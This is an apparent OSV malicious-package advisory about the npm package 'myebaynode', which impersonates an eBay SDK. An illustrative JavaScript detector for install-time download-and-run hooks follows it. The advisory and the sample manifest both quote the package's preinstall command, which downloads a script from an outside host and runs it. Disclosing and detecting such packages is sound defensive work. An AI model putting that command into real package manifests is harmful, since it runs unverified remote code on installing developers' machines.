myebaynode@99.0.0
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID: MAL-2026-6296
Ecosystem: npm
Summary
The package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on npm install. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with the full filesystem and network access of the installing user. The package name 'myebaynode', the description 'Ebay Node Package', version 99.0.0, and the minimal metadata (author 'aman', no repository) suggest brand impersonation intended to lure developers searching for an eBay SDK.
Source: amazon-inspector (12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3)
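A pre-install check for the pattern the summary describes, as an added example that is not part of the OSV record or of any scanner named here. The function name auditManifest, the regexes and the result fields are assumptions chosen for illustration; the sample manifest is rebuilt from the fields quoted in the summary.

```javascript
// Added example: flag npm install-time hooks that download code and run it.
// The regexes are illustrative heuristics, not a complete detector.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const FETCH = /\b(curl|wget)\b[^|;&]*?(https?:\/\/[^\s'"|;&]+)/i;
const EXEC_AFTER = /[|;&]\s*(node|sh|bash|python3?)\b/i;
const HASH_CHECK = /\b(sha256sum|sha512sum|shasum|openssl\s+dgst)\b/i;

// Hostname of the download URL, or null if it does not parse.
function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

function auditManifest(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const dl = FETCH.exec(cmd);
    if (!dl) continue;
    // Only the part of the command after the download can execute the result.
    const run = EXEC_AFTER.exec(cmd.slice(dl.index + dl[0].length));
    if (!run) continue;
    findings.push({
      hook,
      url: dl[2],
      host: hostOf(dl[2]),
      interpreter: run[1].toLowerCase(),
      // False when the command carries no digest verification (unpinned payload).
      integrityCheck: HASH_CHECK.test(cmd),
    });
  }
  return findings;
}

// Manifest rebuilt from the fields quoted in the summary above.
const SAMPLE_MANIFEST = {
  name: 'myebaynode',
  version: '99.0.0',
  description: 'Ebay Node Package',
  author: 'aman',
  scripts: {
    preinstall: 'curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js',
  },
};

console.log(auditManifest(SAMPLE_MANIFEST));
```

The check only reads the manifest and never runs the hook. Installing with npm's --ignore-scripts flag keeps lifecycle hooks from running at all.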